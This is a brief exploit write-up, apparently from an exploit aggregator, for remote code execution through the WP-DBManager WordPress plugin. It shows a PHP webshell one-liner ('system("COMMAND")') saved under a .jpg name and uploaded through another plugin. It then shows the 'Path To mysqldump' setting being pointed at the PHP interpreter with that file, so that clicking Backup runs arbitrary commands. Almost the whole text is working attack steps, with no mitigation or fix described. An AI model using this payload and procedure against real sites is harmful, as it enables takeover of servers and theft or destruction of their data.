## https://sploitus.com/exploit?id=WPEX-ID:1C8C5861-CE87-4813-9E26-470D63C1903A
# Use any WordPress plugin that allows the users to upload files with extension - ".php" is not required - for example: .jpg (usually many plugins allows such extensions)
# Upload your malicious file, for example: test_rce.jpg with the following content:
<?php system("COMMAND"); ?>
# Go to "DB Options" under WP-DBManager plugin
# Define the below payload as "Path To mysqldump" parameter's value:
/usr/bin/php /var/www/blog/test_rce.jpg
# Go to "Backup DB" and click on "Backup" button
# Command will get executed without any issues